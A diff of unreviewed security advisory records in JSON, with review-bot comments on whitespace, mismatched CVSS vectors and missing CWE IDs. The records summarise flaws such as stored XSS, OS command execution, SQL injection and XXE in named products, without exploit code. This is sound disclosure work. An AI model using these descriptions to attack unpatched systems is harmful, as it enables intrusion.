+ "details": "Improper Input Validation vulnerability in MegaBIP and already unsupported SmodBIP software allows for Stored XSS.This issue affects SmodBIP in all versions and MegaBIP in versions up to 4.36.2 (newer versions were not tested; the vendor has not confirmed fixing the vulnerability). \n\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5378"
+ },
+ {
+ "type": "WEB",
+ "url": "https://cert.pl/en/posts/2023/12/CVE-2023-5378"
+ },
+ {
+ "type": "WEB",
+ "url": "https://cert.pl/posts/2023/12/CVE-2023-5378"
+ },
+ {
+ "type": "WEB",
+ "url": "https://megabip.pl/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://smod.pl/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-20",
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T12:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-9x52-pxhj-x4j7/GHSA-9x52-pxhj-x4j7.json b/advisories/unreviewed/2024/01/GHSA-9x52-pxhj-x4j7/GHSA-9x52-pxhj-x4j7.json
new file mode 100644
index 0000000000000..0a2bf3b81d6ec
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-9x52-pxhj-x4j7/GHSA-9x52-pxhj-x4j7.json
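Review bot: The `details` string of GHSA-9w3h-593p-q56r ends in `\n\n\n` and contains `Stored XSS.This` with no space after the period, so the description was copied from the source record without any trimming or normalization. The same untrimmed whitespace appears in GHSA-9x52-pxhj-x4j7 (a leading space before `Remote command execution`), GHSA-c2j8-9924-mr82 and GHSA-c5mq-q8c8-ppcw (trailing `\n\n`). If the importer keeps descriptions byte-identical to NVD on purpose, a comment in the importer saying so would settle the question; otherwise a trim step at ingest would stop the stray whitespace from reaching every consumer that renders the text.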
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9x52-pxhj-x4j7",
+ "modified": "2024-01-29T15:30:29Z",
+ "published": "2024-01-29T15:30:29Z",
+ "aliases": [
+ "CVE-2024-1015"
+ ],
+ "details": " Remote command execution vulnerability in SE-elektronic GmbH E-DDC3.3 affecting versions 03.07.03 and higher. An attacker could send different commands from the operating system to the system via the web configuration functionality of the device.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1015"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-94"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T14:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-9xm4-hw5v-jpjg/GHSA-9xm4-hw5v-jpjg.json b/advisories/unreviewed/2024/01/GHSA-9xm4-hw5v-jpjg/GHSA-9xm4-hw5v-jpjg.json
index e6db81b7d1dbe..170026628b222 100644
--- a/advisories/unreviewed/2024/01/GHSA-9xm4-hw5v-jpjg/GHSA-9xm4-hw5v-jpjg.json
+++ b/advisories/unreviewed/2024/01/GHSA-9xm4-hw5v-jpjg/GHSA-9xm4-hw5v-jpjg.json
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9xm4-hw5v-jpjg", - "modified": "2024-01-23T15:30:57Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T15:30:57Z", "aliases": [ "CVE-2024-0744" ], "details": "In some circumstances, JIT compiled code could have dereferenced a wild pointer value. This could have led to an exploitable crash. This vulnerability affects Firefox < 122.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-119" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-9xv5-7pc9-8rr3/GHSA-9xv5-7pc9-8rr3.json b/advisories/unreviewed/2024/01/GHSA-9xv5-7pc9-8rr3/GHSA-9xv5-7pc9-8rr3.json new file mode 100644 index 0000000000000..80fc18f7b39c9 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-9xv5-7pc9-8rr3/GHSA-9xv5-7pc9-8rr3.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9xv5-7pc9-8rr3", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-6279" + ], + "details": "The Woostify Sites Library WordPress plugin before 1.4.8 does not have authorisation in an AJAX action, allowing any authenticated users, such as subscriber to update arbitrary blog options and set them to 'activated' which could lead to DoS when using a specific option name", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6279" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/626bbc7d-0d0f-4418-ac61-666278a1cbdb/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-9xx5-8h94-vx2v/GHSA-9xx5-8h94-vx2v.json b/advisories/unreviewed/2024/01/GHSA-9xx5-8h94-vx2v/GHSA-9xx5-8h94-vx2v.json index b35072e74a493..d4460837d4d67 100644 --- a/advisories/unreviewed/2024/01/GHSA-9xx5-8h94-vx2v/GHSA-9xx5-8h94-vx2v.json +++ b/advisories/unreviewed/2024/01/GHSA-9xx5-8h94-vx2v/GHSA-9xx5-8h94-vx2v.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9xx5-8h94-vx2v", - "modified": "2024-01-26T15:30:32Z", + "modified": "2024-02-02T18:30:29Z", "published": "2024-01-26T15:30:32Z", "aliases": [ "CVE-2024-22550" ], "details": "An arbitrary file upload vulnerability in the component /alsdemo/ss/mediam.cgi of ShopSite v14.0 allows attackers to execute arbitrary code via uploading a crafted SVG file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ 
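Review bot: The CVSS vector added for GHSA-9xx5-8h94-vx2v, `AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`, is the usual reflected-XSS profile (scope change, low confidentiality and integrity impact, user interaction required), while the unchanged details line says the SVG upload lets attackers "execute arbitrary code"; the two do not describe the same impact. The next hunk in this file derives `"severity": "MODERATE"` from that vector, so the mismatch propagates into the field consumers filter on. The record is `"github_reviewed": false`, so this is inherited from NVD rather than introduced here, but it belongs in the review queue rather than being accepted silently as a MODERATE advisory whose text claims code execution.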
@@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-434" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T15:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-9xx9-hjg7-g9jj/GHSA-9xx9-hjg7-g9jj.json b/advisories/unreviewed/2024/01/GHSA-9xx9-hjg7-g9jj/GHSA-9xx9-hjg7-g9jj.json index e83af328b875b..4d7138b44a0f2 100644 --- a/advisories/unreviewed/2024/01/GHSA-9xx9-hjg7-g9jj/GHSA-9xx9-hjg7-g9jj.json +++ b/advisories/unreviewed/2024/01/GHSA-9xx9-hjg7-g9jj/GHSA-9xx9-hjg7-g9jj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9xx9-hjg7-g9jj", - "modified": "2024-01-26T09:30:23Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-26T09:30:23Z", "aliases": [ "CVE-2023-48129" ], "details": "An issue in kimono-oldnew mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T08:15:42Z" diff --git a/advisories/unreviewed/2024/01/GHSA-c2h4-p5j3-jcgh/GHSA-c2h4-p5j3-jcgh.json b/advisories/unreviewed/2024/01/GHSA-c2h4-p5j3-jcgh/GHSA-c2h4-p5j3-jcgh.json index a285613ef77d5..fbc0be3dfd91f 100644 --- a/advisories/unreviewed/2024/01/GHSA-c2h4-p5j3-jcgh/GHSA-c2h4-p5j3-jcgh.json +++ b/advisories/unreviewed/2024/01/GHSA-c2h4-p5j3-jcgh/GHSA-c2h4-p5j3-jcgh.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-120" ], "severity": "CRITICAL", "github_reviewed": false, 
diff --git a/advisories/unreviewed/2024/01/GHSA-c2j8-9924-mr82/GHSA-c2j8-9924-mr82.json b/advisories/unreviewed/2024/01/GHSA-c2j8-9924-mr82/GHSA-c2j8-9924-mr82.json
new file mode 100644
index 0000000000000..3e87ad1020c50
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-c2j8-9924-mr82/GHSA-c2j8-9924-mr82.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c2j8-9924-mr82",
+ "modified": "2024-01-31T15:30:20Z",
+ "published": "2024-01-31T15:30:20Z",
+ "aliases": [
+ "CVE-2024-22140"
+ ],
+ "details": "Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs Profile Builder Pro.This issue affects Profile Builder Pro: from n/a through 3.10.0.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22140"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/profile-builder-pro/wordpress-profile-builder-pro-plugin-3-10-0-csrf-leading-to-account-takeover-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T14:15:49Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-c2jp-pq2c-g7jh/GHSA-c2jp-pq2c-g7jh.json b/advisories/unreviewed/2024/01/GHSA-c2jp-pq2c-g7jh/GHSA-c2jp-pq2c-g7jh.json
index 6324a32c6c72a..e186497fd31ea 100644
--- a/advisories/unreviewed/2024/01/GHSA-c2jp-pq2c-g7jh/GHSA-c2jp-pq2c-g7jh.json
+++ b/advisories/unreviewed/2024/01/GHSA-c2jp-pq2c-g7jh/GHSA-c2jp-pq2c-g7jh.json
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-c2jp-pq2c-g7jh", - "modified": "2024-01-27T06:30:23Z", + "modified": "2024-02-01T06:31:04Z", "published": "2024-01-27T06:30:23Z", "aliases": [ "CVE-2023-48202" ], "details": "Cross-Site Scripting (XSS) vulnerability in Sunlight CMS 8.0.1 allows an authenticated low-privileged user to escalate privileges via a crafted SVG file in the File Manager component.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-27T06:15:47Z" diff --git a/advisories/unreviewed/2024/01/GHSA-c352-2vg8-m9gr/GHSA-c352-2vg8-m9gr.json b/advisories/unreviewed/2024/01/GHSA-c352-2vg8-m9gr/GHSA-c352-2vg8-m9gr.json index 456de9b2f21fb..59f8645a8ff5c 100644 --- a/advisories/unreviewed/2024/01/GHSA-c352-2vg8-m9gr/GHSA-c352-2vg8-m9gr.json +++ b/advisories/unreviewed/2024/01/GHSA-c352-2vg8-m9gr/GHSA-c352-2vg8-m9gr.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-c352-2vg8-m9gr", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2024-0810" ], "details": "Insufficient policy enforcement in DevTools in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Medium)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" + } ], "affected": [ @@ -39,7 +42,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:08Z" 
diff --git a/advisories/unreviewed/2024/01/GHSA-c39j-wph3-8c3c/GHSA-c39j-wph3-8c3c.json b/advisories/unreviewed/2024/01/GHSA-c39j-wph3-8c3c/GHSA-c39j-wph3-8c3c.json
new file mode 100644
index 0000000000000..06580f3525829
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-c39j-wph3-8c3c/GHSA-c39j-wph3-8c3c.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c39j-wph3-8c3c",
+ "modified": "2024-01-31T21:31:03Z",
+ "published": "2024-01-31T21:31:03Z",
+ "aliases": [
+ "CVE-2022-47072"
+ ],
+ "details": "SQL injection vulnerability in Enterprise Architect 16.0.1605 32-bit allows attackers to run arbitrary SQL commands via the Find parameter in the Select Classifier dialog box..",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-47072"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/DojoSecurity/Enterprise-Architect-SQL-Injection"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T21:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-c5g8-87c9-j99r/GHSA-c5g8-87c9-j99r.json b/advisories/unreviewed/2024/01/GHSA-c5g8-87c9-j99r/GHSA-c5g8-87c9-j99r.json
new file mode 100644
index 0000000000000..c5e03725f39b5
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-c5g8-87c9-j99r/GHSA-c5g8-87c9-j99r.json
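Review bot: GHSA-c39j-wph3-8c3c is added with an empty `"severity": [ ]`, an empty `"cwe_ids": [ ]` and `"severity": null`, even though its details text names the defect as SQL injection, which maps to CWE-89. An empty severity list is expected while NVD has not scored the CVE, but the other new records in this commit receive a CWE together with the score, so this record will need a resync or a manual `"CWE-89"` once the upstream analysis lands. The only non-NVD reference is a third-party GitHub repository rather than a vendor advisory, so consumers should treat the claim as unconfirmed until a vendor source is attached.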
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c5g8-87c9-j99r",
+ "modified": "2024-01-31T15:30:20Z",
+ "published": "2024-01-31T15:30:20Z",
+ "aliases": [
+ "CVE-2024-1103"
+ ],
+ "details": "A vulnerability was found in CodeAstro Real Estate Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file profile.php of the component Feedback Form. The manipulation of the argument Your Feedback with the input leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252458 is the identifier assigned to this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1103"
+ },
+ {
+ "type": "WEB",
+ "url": "https://docs.google.com/document/d/18M55HRrxHQ9Jhph6CwWF-d5epAKtOSHt/edit?usp=drive_link&ouid=105609487033659389545&rtpof=true&sd=true"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252458"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252458"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T15:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-c5mq-q8c8-ppcw/GHSA-c5mq-q8c8-ppcw.json b/advisories/unreviewed/2024/01/GHSA-c5mq-q8c8-ppcw/GHSA-c5mq-q8c8-ppcw.json
new file mode 100644
index 0000000000000..293139ad6e1f9
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-c5mq-q8c8-ppcw/GHSA-c5mq-q8c8-ppcw.json
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c5mq-q8c8-ppcw", + "modified": "2024-01-30T09:30:34Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2024-21803" + ], + "details": "Use After Free vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (bluetooth modules) allows Local Execution of Code. This vulnerability is associated with program files https://gitee.Com/anolis/cloud-kernel/blob/devel-5.10/net/bluetooth/af_bluetooth.C.\n\nThis issue affects Linux kernel: from v2.6.12-rc2 before v6.8-rc1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21803" + }, + { + "type": "WEB", + "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8081" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T08:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-c5vx-x65g-94m5/GHSA-c5vx-x65g-94m5.json b/advisories/unreviewed/2024/01/GHSA-c5vx-x65g-94m5/GHSA-c5vx-x65g-94m5.json index a740e434a4d5f..7a11cd892d55e 100644 --- a/advisories/unreviewed/2024/01/GHSA-c5vx-x65g-94m5/GHSA-c5vx-x65g-94m5.json +++ b/advisories/unreviewed/2024/01/GHSA-c5vx-x65g-94m5/GHSA-c5vx-x65g-94m5.json @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-c67q-c83x-f549/GHSA-c67q-c83x-f549.json b/advisories/unreviewed/2024/01/GHSA-c67q-c83x-f549/GHSA-c67q-c83x-f549.json index 5bb9cc4c2257e..f3e0b62cbcb95 100644 --- a/advisories/unreviewed/2024/01/GHSA-c67q-c83x-f549/GHSA-c67q-c83x-f549.json +++ b/advisories/unreviewed/2024/01/GHSA-c67q-c83x-f549/GHSA-c67q-c83x-f549.json 
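Review bot: In GHSA-c5mq-q8c8-ppcw the details text claims "Local Execution of Code" from a use-after-free, but the CVSS vector stored beside it is `AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:L`, a network-reachable, availability-only profile; `"severity": "LOW"` follows correctly from that vector but contradicts the description. The only non-NVD reference is the bug tracker of the project named in the description, with no upstream kernel commit or mailing-list reference, so nothing on the record corroborates the stated affected range `from v2.6.12-rc2 before v6.8-rc1`. The inconsistency is inherited from the NVD entry rather than introduced by this sync, but it is a strong candidate for the review queue before consumers act on that range.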
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-c67q-c83x-f549", - "modified": "2024-01-24T03:31:25Z", + "modified": "2024-01-31T00:30:17Z", "published": "2024-01-24T03:31:25Z", "aliases": [ "CVE-2024-21796" ], "details": "Electronic Deliverables Creation Support Tool (Construction Edition) prior to Ver1.0.4 and Electronic Deliverables Creation Support Tool (Design & Survey Edition) prior to Ver1.0.4 improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-611" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T02:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-c69w-p7cc-6h7c/GHSA-c69w-p7cc-6h7c.json b/advisories/unreviewed/2024/01/GHSA-c69w-p7cc-6h7c/GHSA-c69w-p7cc-6h7c.json index 3e382ebe5bb28..b223510a67c6e 100644 --- a/advisories/unreviewed/2024/01/GHSA-c69w-p7cc-6h7c/GHSA-c69w-p7cc-6h7c.json +++ b/advisories/unreviewed/2024/01/GHSA-c69w-p7cc-6h7c/GHSA-c69w-p7cc-6h7c.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-c69w-p7cc-6h7c", - "modified": "2024-01-26T06:30:31Z", + "modified": "2024-02-02T18:30:29Z", "published": "2024-01-26T06:30:31Z", "aliases": [ "CVE-2023-38323" ], "details": "An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the status path script entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ 
@@ -37,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-78" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T05:15:12Z" diff --git a/advisories/unreviewed/2024/01/GHSA-c6mw-5fmv-25qx/GHSA-c6mw-5fmv-25qx.json b/advisories/unreviewed/2024/01/GHSA-c6mw-5fmv-25qx/GHSA-c6mw-5fmv-25qx.json index e58851fcd5dae..18a096f6a4480 100644 --- a/advisories/unreviewed/2024/01/GHSA-c6mw-5fmv-25qx/GHSA-c6mw-5fmv-25qx.json +++ b/advisories/unreviewed/2024/01/GHSA-c6mw-5fmv-25qx/GHSA-c6mw-5fmv-25qx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-c6mw-5fmv-25qx", - "modified": "2024-01-23T03:31:08Z", + "modified": "2024-01-30T15:30:21Z", "published": "2024-01-23T03:31:08Z", "aliases": [ "CVE-2024-23219" ], "details": "The issue was addressed with improved authentication. This issue is fixed in iOS 17.3 and iPadOS 17.3. Stolen Device Protection may be unexpectedly disabled.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-287" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-c6mx-w98j-fgrj/GHSA-c6mx-w98j-fgrj.json b/advisories/unreviewed/2024/01/GHSA-c6mx-w98j-fgrj/GHSA-c6mx-w98j-fgrj.json new file mode 100644 index 0000000000000..9d6dd22e9abaf --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-c6mx-w98j-fgrj/GHSA-c6mx-w98j-fgrj.json 
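Review bot: The `"severity": "CRITICAL"` set here for GHSA-c69w-p7cc-6h7c follows from the vector added in the previous hunk, `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`, yet the details text limits the issue to "attackers that have direct or indirect access to this file", i.e. someone who can already modify the OpenNDS configuration. A network, no-privilege vector does not reflect that precondition, so the CRITICAL label overstates what the description supports. Since the record is `"github_reviewed": false` the vector should not be edited in this sync; it should be queued for review, where it can be rescored or the precondition called out in the advisory text.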
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c6mx-w98j-fgrj",
+ "modified": "2024-02-08T03:32:45Z",
+ "published": "2024-01-30T09:30:33Z",
+ "aliases": [
+ "CVE-2023-52071"
+ ],
+ "details": "tiny-curl-8_4_0 , curl-8_4_0 and curl-8_5_0 were discovered to contain an off-by-one out-of-bounds array index via the component tool_cb_wrt.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52071"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/curl/curl/commit/73980f9ace6c7577e7fcab8008bbde8a0a231692"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/curl/curl/commit/af3f4e41#r127212213"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-129"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T07:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-c7jw-pgmq-gj8x/GHSA-c7jw-pgmq-gj8x.json b/advisories/unreviewed/2024/01/GHSA-c7jw-pgmq-gj8x/GHSA-c7jw-pgmq-gj8x.json
new file mode 100644
index 0000000000000..23d31525cd20b
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-c7jw-pgmq-gj8x/GHSA-c7jw-pgmq-gj8x.json
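Review bot: GHSA-c6mx-w98j-fgrj cites only two curl commits as references, one of them a commit-comment anchor (`#r127212213`) rather than a fix or an advisory, and no curl security advisory URL, so nothing on the record shows the vendor acknowledging the CVE. For a project that publishes its own advisories that gap is worth checking before the record is relied on; if the vendor disputes the CVE, OSV schema 1.4.0 provides a `withdrawn` timestamp for that case, which is preferable to leaving the record live with `"severity": "MODERATE"`. Note also that `"modified"` (2024-02-08) is already later than `"published"` (2024-01-30) in this new-file hunk, so the record was touched upstream between import and this commit.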
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c7jw-pgmq-gj8x",
+ "modified": "2024-02-08T03:32:45Z",
+ "published": "2024-01-29T21:30:27Z",
+ "aliases": [
+ "CVE-2023-22836"
+ ],
+ "details": "In cases where a multi-tenant stack user is operating Foundry’s Linter service, and the user changes a group name from the default value, the renamed value may be visible to the rest of the stack’s tenants.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-22836"
+ },
+ {
+ "type": "WEB",
+ "url": "https://palantir.safebase.us/?tcuUid=f9bf67ef-be15-4f87-a526-bf6064e8f682"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T19:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-c822-34mg-g7p6/GHSA-c822-34mg-g7p6.json b/advisories/unreviewed/2024/01/GHSA-c822-34mg-g7p6/GHSA-c822-34mg-g7p6.json
new file mode 100644
index 0000000000000..a4880e15f9057
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-c822-34mg-g7p6/GHSA-c822-34mg-g7p6.json
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c822-34mg-g7p6",
+ "modified": "2024-01-29T18:31:53Z",
+ "published": "2024-01-29T18:31:53Z",
+ "aliases": [
+ "CVE-2024-1010"
+ ],
